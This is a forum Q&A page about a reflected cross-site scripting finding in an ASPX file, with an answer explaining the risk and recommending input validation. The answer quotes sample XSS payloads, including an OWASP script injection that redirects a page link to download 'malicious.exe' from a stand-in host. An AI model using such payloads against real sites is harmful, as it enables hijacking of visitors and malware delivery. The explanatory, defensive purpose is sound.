XSS issue

What does it mean when you receive in error in a aspx file:

URI was set to javascript:prompt(995668)
The input is reflected inside A tag href parameter, a Form tag action parameter or (I)FRAME src parameter.
Lawrence AverySystem DeveloperAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

btanExec ConsultantCommented:
Error is most often triggered like this case during parsing saying the JS is encountered and either the browser cannot parse it to run it or more likely, it is from the source codes taking the JS as an input field for further processing and has error. an example can simply be from the GET like below.

http://goodsite.com/gallery.html?showimage=javascript:evil-script-here

That "showimage" field may be used inside your codes in an iframe, link, image URL or form submission functions.. most of these is non legit and as stated high chance XSS attempt. You need input validation at all the functions or parameter parsing related codes. If the data is evaluated by the page using the eval or an equivalent method, attackers can simply feed their script directly into that parameter. A script must never (at least in simple coding) evaluate something passed as a parameter to the page..

It can even get uglier like another OWASP example (2)
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");
AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>

This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls.
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)#Example_2
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Vulnerabilities

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.